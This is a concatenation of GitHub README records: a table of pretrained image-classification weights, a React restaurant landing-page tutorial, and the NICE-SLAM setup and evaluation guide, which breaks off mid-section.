|**MLP Mixer**|[base_p16](https://download.openmmlab.com/mmclassification/v0/mlp-mixer/mixer-base-p16_3rdparty_64xb64_in1k_20211124-1377e3e0.pth)<br/>[large_p16](https://download.openmmlab.com/mmclassification/v0/mlp-mixer/mixer-large-p16_3rdparty_64xb64_in1k_20211124-5a2519d2.pth)|**Deit**|[DeiT-tiny](https://download.openmmlab.com/mmclassification/v0/deit/deit-tiny_pt-4xb256_in1k_20220218-13b382a0.pth)<br/>[DeiT-tiny distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-tiny-distilled_3rdparty_pt-4xb256_in1k_20211216-c429839a.pth)<br/>[DeiT-small](https://download.openmmlab.com/mmclassification/v0/deit/deit-small_pt-4xb256_in1k_20220218-9425b9bb.pth)<br/>[DeiT-small distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-small-distilled_3rdparty_pt-4xb256_in1k_20211216-4de1d725.pth)<br/>[DeiT-base](https://download.openmmlab.com/mmclassification/v0/deit/deit-base_pt-16xb64_in1k_20220216-db63c16c.pth)<br/>[DeiT-base distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-base-distilled_3rdparty_pt-16xb64_in1k_20211216-42891296.pth)<br/>[DeiT-base 384px](https://download.openmmlab.com/mmclassification/v0/deit/deit-base_3rdparty_ft-16xb32_in1k-384px_20211124-822d02f2.pth)<br/>[DeiT-base distilled 384px](https://download.openmmlab.com/mmclassification/v0/deit/deit-base-distilled_3rdparty_ft-16xb32_in1k-384px_20211216-e48d6000.pth)|**Conformer**|[Conformer-tiny-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-tiny-p16_3rdparty_8xb128_in1k_20211206-f6860372.pth)<br/>[Conformer-small-p32](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-small-p32_8xb128_in1k_20211206-947a0816.pth)<br/>[Conformer-small-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-small-p16_3rdparty_8xb128_in1k_20211206-3065dcf5.pth)<br/>[Conformer-base-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-base-p16_3rdparty_8xb128_in1k_20211206-bfdf8637.pth)|
|**T2T-ViT**|[T2T-ViT_t-14](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-14_8xb64_in1k_20211220-f7378dd5.pth)<br/>[T2T-ViT_t-19](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-19_8xb64_in1k_20211214-7f5e3aaf.pth)<br/>[T2T-ViT_t-24](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-24_8xb64_in1k_20211214-b2a68ae3.pth)|**Twins**|[PCPVT-small](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-small_3rdparty_8xb128_in1k_20220126-ef23c132.pth)<br/>[PCPVT-base](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-base_3rdparty_8xb128_in1k_20220126-f8c4b0d5.pth)<br/>[PCPVT-large](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-large_3rdparty_16xb64_in1k_20220126-c1ef8d80.pth)<br/>[SVT-small](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-small_3rdparty_8xb128_in1k_20220126-8fe5205b.pth)<br/>[SVT-base](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-base_3rdparty_8xb128_in1k_20220126-e31cc8e9.pth)<br/>[SVT-large](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-large_3rdparty_16xb64_in1k_20220126-4817645f.pth)|**PoolFormer**|[PoolFormer-S12](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s12_3rdparty_32xb128_in1k_20220414-f8d83051.pth)<br/>[PoolFormer-S24](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s24_3rdparty_32xb128_in1k_20220414-d7055904.pth)<br/>[PoolFormer-S36](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s36_3rdparty_32xb128_in1k_20220414-d78ff3e8.pth)<br/>[PoolFormer-M36](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-m36_3rdparty_32xb128_in1k_20220414-c55e0949.pth)<br/>[PoolFormer-M48](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-m48_3rdparty_32xb128_in1k_20220414-9378f3eb.pth)|
|**DenseNet**|[DenseNet121](https://download.openmmlab.com/mmclassification/v0/densenet/densenet121_4xb256_in1k_20220426-07450f99.pth)<br/>[DenseNet161](https://download.openmmlab.com/mmclassification/v0/densenet/densenet161_4xb256_in1k_20220426-ee6a80a9.pth)<br/>[DenseNet169](https://download.openmmlab.com/mmclassification/v0/densenet/densenet169_4xb256_in1k_20220426-a2889902.pth)<br/>[DenseNet201](https://download.openmmlab.com/mmclassification/v0/densenet/densenet201_4xb256_in1k_20220426-05cae4ef.pth)|**Visual Attention Network(VAN)**|[VAN-Tiny](https://download.openmmlab.com/mmclassification/v0/van/van-tiny_8xb128_in1k_20220501-385941af.pth)<br/>[VAN-Small](https://download.openmmlab.com/mmclassification/v0/van/van-small_8xb128_in1k_20220501-17bc91aa.pth)<br/>[VAN-Base](https://download.openmmlab.com/mmclassification/v0/van/van-base_8xb128_in1k_20220501-6a4cc31b.pth)<br/>[VAN-Large](https://download.openmmlab.com/mmclassification/v0/van/van-large_8xb128_in1k_20220501-f212ba21.pth)|**Wide-ResNet**|[WRN-50](https://download.openmmlab.com/mmclassification/v0/wrn/wide-resnet50_3rdparty-timm_8xb32_in1k_20220304-83ae4399.pth)<br/>[WRN-101](https://download.openmmlab.com/mmclassification/v0/wrn/wide-resnet101_3rdparty_8xb32_in1k_20220304-8d5f9d61.pth)|
|**HorNet**|[HorNet-Tiny](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-tiny_3rdparty_in1k_20220915-0e8eedff.pth)<br/>[HorNet-Tiny-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-tiny-gf_3rdparty_in1k_20220915-4c35a66b.pth)<br/>[HorNet-Small](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-small_3rdparty_in1k_20220915-5935f60f.pth)<br/>[HorNet-Small-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-small-gf_3rdparty_in1k_20220915-649ca492.pth)<br/>[HorNet-Base](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base_3rdparty_in1k_20220915-a06176bb.pth)<br/>[HorNet-Base-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base-gf_3rdparty_in1k_20220915-82c06fa7.pth)<br/>[HorNet-Large](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-large_3rdparty_in21k_20220909-9ccef421.pth)<br/>[HorNet-Large-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-large-gf_3rdparty_in21k_20220909-3aea3b61.pth)<br/>[HorNet-Large-GF384](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base-gf_3rdparty_in1k_20220915-82c06fa7.pth)|**EfficientFormer**|[efficientformer-l1](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l1_3rdparty_in1k_20220803-d66e61df.pth)<br/>[efficientformer-l3](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l3_3rdparty_in1k_20220803-dde1c8c5.pth)<br/>[efficientformer-l7](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l7_3rdparty_in1k_20220803-41a552bb.pth)|**Swin Transformer v2**|[tiny-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-tiny-w8_3rdparty_in1k-256px_20220803-e318968f.pth)<br/>[tiny-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-tiny-w16_3rdparty_in1k-256px_20220803-9651cdd7.pth)<br/>[small-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-small-w8_3rdparty_in1k-256px_20220803-b01a4332.pth)<br/>[small-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-small-w16_3rdparty_in1k-256px_20220803-b707d206.pth)<br/>[base-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-base-w8_3rdparty_in1k-256px_20220803-8ff28f2b.pth)<br/>[base-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-base-w16_3rdparty_in1k-256px_20220803-5a1886b7.pth)<br/>[large-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-large-w16_in21k-pre_3rdparty_in1k-256px_20220803-c40cbed7.pth)<br/>[large-384 window 24](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-large-w24_in21k-pre_3rdparty_in1k-384px_20220803-3b36c165.pth)|
|**MViTv2**|[MViTv2-Tiny](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-tiny_3rdparty_in1k_20220722-db7beeef.pth)<br/>[MViTv2-Small](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-small_3rdparty_in1k_20220722-986bd741.pth)<br/>[MViTv2-Base](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-base_3rdparty_in1k_20220722-9c4f0a17.pth)<br/>[MViTv2-Large](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-large_3rdparty_in1k_20220722-2b57b983.pth)|**MobileVit**|[MobileViT-XXSmall](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-xxsmall_3rdparty_in1k_20221018-77835605.pth)<br>[MobileViT-XSmall](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-xsmall_3rdparty_in1k_20221018-be39a6e7.pth)<br>[MobileViT-Small](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-small_3rdparty_in1k_20221018-cb4f741c.pth)|**DaViT**|[DaViT-T](https://download.openmmlab.com/mmclassification/v0/davit/davit-tiny_3rdparty_in1k_20221116-700fdf7d.pth)<br>[DaViT-S](https://download.openmmlab.com/mmclassification/v0/davit/davit-small_3rdparty_in1k_20221116-51a849a6.pth)<br>[DaViT-B](https://download.openmmlab.com/mmclassification/v0/davit/davit-base_3rdparty_in1k_20221116-19e0d956.pth)|
|**RepLKNet**|[RepLKNet-31B-224](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31B_in21k-pre_3rdparty_in1k_20221118-54ed5c46.pth)<br>[RepLKNet-31B-384](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31B_in21k-pre_3rdparty_in1k-384px_20221118-76c92b24.pth)<br>[RepLKNet-31L-384](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31L_in21k-pre_3rdparty_in1k-384px_20221118-dc3fc07c.pth)<br>[RepLKNet-XL](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-XL_meg73m-pre_3rdparty_in1k-320px_20221118-88259b1d.pth)|**BEiT**|[BEiT-base](https://download.openmmlab.com/mmclassification/v0/beit/beit-base_3rdparty_in1k_20221114-c0a4df23.pth)|**EVA**|[EVA-G-p14-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-pre_3rdparty_in21k_20221213-d72285b7.pth)<br>[EVA-G-p14-336](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-in21k-pre_3rdparty_in1k-336px_20221213-210f9071.pth)<br>[EVA-G-p14-560](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-in21k-pre_3rdparty_in1k-560px_20221213-fa1c3652.pth)<br>[EVA-G-p16-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p16_3rdparty_30m_20221213-7bed23ee.pth)<br>[EVA-L-p14-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-pre_3rdparty_in21k_20221213-8f194fa2.pth)<br>[EVA-L-p14-196](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-in21k-pre_3rdparty_in1k-196px_20221213-b730c7e7.pth)<br>[EVA-L-p14-336](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-in21k-pre_3rdparty_in1k-336px_20221213-f25b7634.pth)
|**MixMIM**|[mixmim-base](https://download.openmmlab.com/mmclassification/v0/mixmim/mixmim-base_3rdparty_in1k_20221206-e40e2c8c.pth)|**EfficientNetV2**|[EfficientNetV2-b0](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b0_3rdparty_in1k_20221221-9ef6e736.pth)<br>[EfficientNetV2-b1](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b1_3rdparty_in1k_20221221-6955d9ce.pth)<br>[EfficientNetV2-b2](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b2_3rdparty_in1k_20221221-74f7d493.pth)<br>[EfficientNetV2-b3](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b3_3rdparty_in1k_20221221-b6f07a36.pth)<br>[EfficientNetV2-s](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-s_in21k-pre-3rdparty_in1k_20221220-7a7c8475.pth)<br>[EfficientNetV2-m](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-m_in21k-pre-3rdparty_in1k_20221220-a1013a04.pth)<br>[EfficientNetV2-l](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-l_in21k-pre-3rdparty_in1k_20221220-63df0efd.pth)<br>[EfficientNetV2-xl](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-xl_in21k-pre-3rdparty_in1k_20221220-583ac18b.pth)|**DeiT3**|[deit3_small_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-small-p16_3rdparty_in1k_20221008-0f7c70cf.pth)<br/>[deit3_small_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-small-p16_3rdparty_in1k-384px_20221008-a2c1a0c7.pth)<br/>[deit3_base_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-base-p16_3rdparty_in1k_20221008-60b8c8bf.pth)<br/>[deit3_base_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-base-p16_3rdparty_in1k-384px_20221009-e19e36d4.pth)<br/>[deit3_medium_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-medium-p16_3rdparty_in1k_20221008-3b21284d.pth)<br/>[deit3_large_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-large-p16_3rdparty_in1k_20221009-03b427ea.pth)<br/>[deit3_large_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-large-p16_3rdparty_in1k-384px_20221009-4317ce62.pth)<br/>[deit3_huge_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-huge-p14_3rdparty_in1k_20221009-e107bcb7.pth)|
|**EdgeNeXt**|[edgenext-base](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-base_3rdparty_in1k_20220801-9ade408b.pth)<br>[edgenext-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-small_3rdparty_in1k_20220801-d00db5f8.pth)<br>[edgenext-X-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-xsmall_3rdparty_in1k_20220801-974f9fe7.pth)<br>[edgenext-XX-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-xxsmall_3rdparty_in1k_20220801-7ca8a81d.pth)|**RevVisionTransformer**|[revvit-small](https://download.openmmlab.com/mmclassification/v0/revvit/revvit-base_3rdparty_in1k_20221213-87a7b0a5.pth)<br>[revvit-base](https://download.openmmlab.com/mmclassification/v0/revvit/revvit-small_3rdparty_in1k_20221213-a3a34f5c.pth)
## 我维护的其他项目
- [**图片数据不够?我做了一款图像增强软件**](https://github.com/Fafa-DL/Image-Augmentation)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Image-Augmentation)](https://github.com/Fafa-DL/Image-Augmentation)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Image-Augmentation)](https://github.com/Fafa-DL/Image-Augmentation)
- [**一键转换与编辑图像标注文件软件,极大提高效率**](https://github.com/Fafa-DL/LabelConvert)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/LabelConvert)](https://github.com/Fafa-DL/LabelConvert)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/LabelConvert)](https://github.com/Fafa-DL/LabelConvert)
## 参考
```
@repo{2020mmclassification,
title={OpenMMLab's Image Classification Toolbox and Benchmark},
author={MMClassification Contributors},
howpublished = {\url{https://github.com/open-mmlab/mmclassification}},
year={2020}
}
```
| Integrate deep learning models for image classification | Backbone learning/comparison/magic modification project | pytorch,image-classification,transformer,cnn,pytorch-classification,deep-learning,resnet,swin-transformer | 0 | 2 | 1 | 117 | 23 | 1 | 0 |
adrianhajdin/project_modern_ui_ux_restaurant | # Restaurant Landing Page
### [Live Site](https://gericht-restaurant.com/)
![Restaurant Landing Page](https://i.ibb.co/5jxBKpw/image.png)
### [🌟 Become a top 1% Next.js 13 developer in only one course](https://jsmastery.pro/next13)
### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)
## Stay up to date with new projects
New major projects coming soon, subscribe to the mailing list to stay up to date https://resource.jsmasterypro.com/newsletter
## Introduction
This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website
You might be wondering, what are the prerequisites for building such an amazing website? Don't worry, this course is completely beginner-friendly! We're going to start easy and them move to more complex topics. Every step of the way will be explained. Alongside building the website, you'll learn:
- React Functional components and their reusability
- React file and folder structure
- Fundamental CSS properties to master flex & grid
- Fundamentals of the CSS BEM Model
- From soft and pleasant animations to complex gradients
- Perfectly placed media queries for satisfactory responsiveness covering almost devices
- And at the end you'll learn how to deploy your websites to extremely fast servers and give them a custom domain name.
| This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website | react,reactjs,modern,ui,ux | 0 | 2 | 8 | 13 | 7 | 1 | 0 |
cvg/nice-slam | <!-- PROJECT LOGO -->
<p align="center">
<h1 align="center"><img src="media/logo.png" width="60">NICE-SLAM: Neural Implicit Scalable Encoding for SLAM</h1>
<p align="center">
<a href="https://zzh2000.github.io"><strong>Zihan Zhu*</strong></a>
·
<a href="https://pengsongyou.github.io"><strong>Songyou Peng*</strong></a>
·
<a href="http://people.inf.ethz.ch/vlarsson/"><strong>Viktor Larsson</strong></a>
·
<a href="http://www.cad.zju.edu.cn/home/weiweixu/weiweixu_en.htm"><strong>Weiwei Xu</strong></a>
·
<a href="http://www.cad.zju.edu.cn/home/bao/"><strong>Hujun Bao</strong></a>
<br>
<a href="https://zhpcui.github.io/"><strong>Zhaopeng Cui</strong></a>
·
<a href="http://people.inf.ethz.ch/moswald/"><strong>Martin R. Oswald</strong></a>
·
<a href="https://people.inf.ethz.ch/pomarc/"><strong>Marc Pollefeys</strong></a>
</p>
<p align="center"><strong>(* Equal Contribution)</strong></p>
<h2 align="center">CVPR 2022</h2>
<h3 align="center"><a href="https://arxiv.org/abs/2112.12130">Paper</a> | <a href="https://youtu.be/V5hYTz5os0M">Video</a> | <a href="https://pengsongyou.github.io/nice-slam">Project Page</a></h3>
<div align="center"></div>
</p>
<p align="center">
<a href="">
<img src="./media/apartment.gif" alt="Logo" width="80%">
</a>
</p>
<p align="center">
NICE-SLAM produces accurate dense geometry and camera tracking on large-scale indoor scenes.
</p>
<p align="center">
(The black / red lines are the ground truth / predicted camera trajectory)
</p>
<br>
<br>
<!-- TABLE OF CONTENTS -->
<details open="open" style='padding: 10px; border-radius:5px 30px 30px 5px; border-style: solid; border-width: 1px;'>
<summary>Table of Contents</summary>
<ol>
<li>
<a href="#installation">Installation</a>
</li>
<li>
<a href="#visualizing-nice-slam-results">Visualization</a>
</li>
<li>
<a href="#demo">Demo</a>
</li>
<li>
<a href="#run">Run</a>
</li>
<li>
<a href="#imap">iMAP*</a>
</li>
<li>
<a href="#evaluation">Evaluation</a>
</li>
<li>
<a href="#acknowledgement">Acknowledgement</a>
</li>
<li>
<a href="#citation">Citation</a>
</li>
<li>
<a href="#contact">Contact</a>
</li>
</ol>
</details>
## Installation
First you have to make sure that you have all dependencies in place.
The simplest way to do so, is to use [anaconda](https://www.anaconda.com/).
You can create an anaconda environment called `nice-slam`. For linux, you need to install **libopenexr-dev** before creating the environment.
```bash
sudo apt-get install libopenexr-dev
conda env create -f environment.yaml
conda activate nice-slam
```
## Visualizing NICE-SLAM Results
We provide the results of NICE-SLAM ready for download. You can run our **interactive visualizer** as following.
### Self-captured Apartment
To visualize our results on the self-captured apartment, as shown in the teaser:
```bash
bash scripts/download_vis_apartment.sh
python visualizer.py configs/Apartment/apartment.yaml --output output/vis/Apartment
```
**Note for users from China:** If you encounter slow speed in downloading, check in all the `scripts/download_*.sh` scripts, where we also provide the 和彩云 links for you to download manually.
### ScanNet
```bash
bash scripts/download_vis_scene0000.sh
python visualizer.py configs/ScanNet/scene0000.yaml --output output/vis/scannet/scans/scene0000_00
```
<p align="center">
<img src="./media/scannet.gif" width="60%" />
</p>
You can find the results of NICE-SLAM on other scenes in ScanNet [here](https://cvg-data.inf.ethz.ch/nice-slam/vis/scannet/).
### Replica
```bash
bash scripts/download_vis_room1.sh
python visualizer.py configs/Replica/room1.yaml --output output/vis/Replica/room1
```
<p align="center">
<img src="./media/replica.gif" width="70%" />
</p
You can find the results of NICE-SLAM on other scenes in Replica [here](https://cvg-data.inf.ethz.ch/nice-slam/vis/Replica/).
### Interactive Visualizer Usage
The black trajectory indicates the ground truth trajectory, abd the red is trajectory of NICE-SLAM.
- Press `Ctrl+0` for grey mesh rendering.
- Press `Ctrl+1` for textured mesh rendering.
- Press `Ctrl+9` for normal rendering.
- Press `L` to turn off/on lighting.
### Command line arguments
- `--output $OUTPUT_FOLDER` output folder (overwrite the output folder in the config file)
- `--input_folder $INPUT_FOLDER` input folder (overwrite the input folder in the config file)
- `--save_rendering` save rendering video to `vis.mp4` in the output folder
- `--no_gt_traj` do not show ground truth trajectory
- `--imap` visualize results of iMAP*
- `--vis_input_frame` opens up a viewer to show input frames. Note: you need to download the dataset first. See the Run section below.
## Demo
Here you can run NICE-SLAM yourself on a short ScanNet sequence with 500 frames.
First, download the demo data as below and the data is saved into the `./Datasets/Demo` folder.
```bash
bash scripts/download_demo.sh
```
Next, run NICE-SLAM. It takes a few minutes with ~5G GPU memory.
```bash
python -W ignore run.py configs/Demo/demo.yaml
```
Finally, run the following command to visualize.
```bash
python visualizer.py configs/Demo/demo.yaml
```
**NOTE:** This is for demonstration only, its configuration/performance may be different from our paper.
## Run
### Self-captured Apartment
Download the data as below and the data is saved into the `./Datasets/Apartment` folder.
```bash
bash scripts/download_apartment.sh
```
Next, run NICE-SLAM:
```bash
python -W ignore run.py configs/Apartment/apartment.yaml
```
### ScanNet
Please follow the data downloading procedure on [ScanNet](http://www.scan-net.org/) website, and extract color/depth frames from the `.sens` file using this [code](https://github.com/ScanNet/ScanNet/blob/master/SensReader/python/reader.py).
<details>
<summary>[Directory structure of ScanNet (click to expand)]</summary>
DATAROOT is `./Datasets` by default. If a sequence (`sceneXXXX_XX`) is stored in other places, please change the `input_folder` path in the config file or in the command line.
```
DATAROOT
└── scannet
└── scans
└── scene0000_00
└── frames
├── color
│ ├── 0.jpg
│ ├── 1.jpg
│ ├── ...
│ └── ...
├── depth
│ ├── 0.png
│ ├── 1.png
│ ├── ...
│ └── ...
├── intrinsic
└── pose
├── 0.txt
├── 1.txt
├── ...
└── ...
```
</details>
Once the data is downloaded and set up properly, you can run NICE-SLAM:
```bash
python -W ignore run.py configs/ScanNet/scene0000.yaml
```
### Replica
Download the data as below and the data is saved into the `./Datasets/Replica` folder. Note that the Replica data is generated by the authors of iMAP, so please cite iMAP if you use the data.
```bash
bash scripts/download_replica.sh
```
and you can run NICE-SLAM:
```bash
python -W ignore run.py configs/Replica/room0.yaml
```
The mesh for evaluation is saved as `$OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply`, where the unseen regions are culled using all frames.
### TUM RGB-D
Download the data as below and the data is saved into the `./Datasets/TUM-RGBD` folder
```bash
bash scripts/download_tum.sh
```
Now run NICE-SLAM:
```bash
python -W ignore run.py configs/TUM_RGBD/freiburg1_desk.yaml
```
### Co-Fusion
First, download the dataset. This script should download and unpack the data automatically into the `./Datasets/CoFusion` folder.
```bash
bash scripts/download_cofusion.sh
```
Run NICE-SLAM:
```bash
python -W ignore run.py configs/CoFusion/room4.yaml
```
### Use your own RGB-D sequence from Kinect Azure
<details>
<summary>[Details (click to expand)]</summary>
1. Please first follow this [guide](http://www.open3d.org/docs/release/tutorial/sensor/azure_kinect.html#install-the-azure-kinect-sdk) to record a sequence and extract aligned color and depth images. (Remember to use `--align_depth_to_color` for `azure_kinect_recorder.py`)
DATAROOT is `./Datasets` in default, if a sequence (`sceneXX`) is stored in other places, please change the "input_folder" path in the config file or in the command line.
```
DATAROOT
└── Own
└── scene0
├── color
│ ├── 00000.jpg
│ ├── 00001.jpg
│ ├── 00002.jpg
│ ├── ...
│ └── ...
├── config.json
├── depth
│ ├── 00000.png
│ ├── 00001.png
│ ├── 00002.png
│ ├── ...
│ └── ...
└── intrinsic.json
```
2. Prepare `.yaml` file based on the `configs/Own/sample.yaml`. Change the camera intrinsics in the config file based on `intrinsic.json`. You can also get the intrinsics of the depth camera via other tools such as MATLAB.
3. Specify the bound of the scene. If no ground truth camera pose is given, we construct world coordinates on the first frame. The X-axis is from left to right, Y-axis is from down to up, Z-axis is from front to back.
4. Change the `input_folder` path and/or the `output` path in the config file or the command line.
5. Run NICE-SLAM.
```bash
python -W ignore run.py configs/Own/sample.yaml
```
**(Optional but highly Recommended)** If you don't want to specify the bound of the scene or manually change the config file. You can first run the Redwood tool in [Open3D](http://www.open3d.org/) and then run NICE-SLAM. Here we provide steps for the whole pipeline, beginning from recording Azure Kinect videos. (Ubuntu 18.04 and above is recommended.)
1. Download the Open3D repository.
```bash
bash scripts/download_open3d.sh
```
2. Record and extract frames.
```bash
# specify scene ID
sceneid=0
cd 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/
# record and save to .mkv file
python sensors/azure_kinect_recorder.py --align_depth_to_color --output scene$sceneid.mkv
# extract frames
python sensors/azure_kinect_mkv_reader.py --input scene$sceneid.mkv --output dataset/scene$sceneid
```
3. Run reconstruction.
```bash
python run_system.py dataset/scene$sceneid/config.json --make --register --refine --integrate
# back to main folder
cd ../../../../../
```
4. Prepare the config file.
```bash
python src/tools/prep_own_data.py --scene_folder 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/dataset/scene$sceneid --ouput_config configs/Own/scene$sceneid.yaml
```
5. Run NICE-SLAM.
```bash
python -W ignore run.py configs/Own/scene$sceneid.yaml
```
</details>
## iMAP*
We also provide our re-implementation of iMAP (iMAP*) for use. If you use the code, please cite both the original iMAP paper and NICE-SLAM.
### Usage
iMAP* shares a majority part of the code with NICE-SLAM. To run iMAP*, simply use `*_imap.yaml` in the config file and also add the argument `--imap` in the command line. For example, to run iMAP* on Replica room0:
```bash
python -W ignore run.py configs/Replica/room0_imap.yaml --imap
```
To use our interactive visualizer:
```bash
python visualizer.py configs/Replica/room0_imap.yaml --imap
```
To evaluate ATE:
```bash
python src/tools/eval_ate.py configs/Replica/room0_imap.yaml --imap
```
<details>
<summary>[<strong>Differences between iMAP* and the original iMAP</strong> (click to expand)]</summary>
#### Keyframe pose optimization during mapping
We do not optimize the selected keyframes' poses for iMAP*, because optimizing them usually leads to worse performance. One possible reason is that since their keyframes are selected globally, and many of them do not have overlapping regions especially when the scene gets larger. Overlap is a prerequisite for bundle adjustment (BA). For NICE-SLAM, we only select overlapping keyframes within a small window (local BA), which works well in all scenes. You can still turn on the keyframe pose optimization during mapping for iMAP* by enabling `BA` in the config file.
#### Active sampling
We disable the active sampling in iMAP*, because in our experiments we observe that it does not help to improve the performance while brings additional computational overhead.
For the image active sampling, in each iteration the original iMAP uniformly samples 200 pixels in the entire image. Next, they divide this image into an 8x8 grid and calculate the probability distribution from the rendering losses. This means that if the resolution of an image is 1200x680 (Replica), only around 3 pixels are sampled to calculate the distribution for a 150x85 grid patch. This is not too much different from simple uniform sampling. Therefore, during mapping we use the same pixel sampling strategy as NICE-SLAM for iMAP*: uniform sampling, but even 4x more pixels than reported in the iMAP paper.
For the keyframe active sampling, the original iMAP requires rendering depth and color images for all keyframes to get the loss distribution, which is expensive and we again did not find it very helpful. Instead, as done in NICE-SLAM, iMAP* randomly samples keyframes from the keyframe list. We also let iMAP* optimize for 4x more iterations than NICE-SLAM, but their performance is still inferior.
#### Keyframe selection
For fair comparison, we use the same keyframe selection method in iMAP* as in NICE-SLAM: add one keyframe to the keyframe list every 50 frames.
</details>
## Evaluation
### Average Trajectory Error
To evaluate the average trajectory error. Run the command below with the corresponding config file:
```bash
python src/tools/eval_ate.py configs/Replica/room0.yaml
```
### Reconstruction Error
To evaluate the reconstruction error, first download the ground truth Replica meshes where unseen region have been culled.
```bash
bash scripts/download_cull_replica_mesh.sh
```
Then run the command below (same for NICE-SLAM and iMAP*). The 2D metric requires rendering of 1000 depth images, which will take some time (~9 minutes). Use `-2d` to enable 2D metric. Use `-3d` to enable 3D metric.
```bash
# assign any output_folder and gt mesh you like, here is just an example
OUTPUT_FOLDER=output/Replica/room0
GT_MESH=cull_replica_mesh/room0.ply
python src/tools/eval_recon.py --rec_mesh $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply --gt_mesh $GT_MESH -2d -3d
```
We also provide code to cull the mesh given camera poses. Here we take culling of ground truth mesh of Replica room0 as an example.
```bash
python src/tools/cull_mesh.py --input_mesh Datasets/Replica/room0_mesh.ply --traj Datasets/Replica/room0/traj.txt --output_mesh cull_replica_mesh/room0.ply
```
<details>
<summary>[For iMAP* evaluation (click to expand)]</summary>
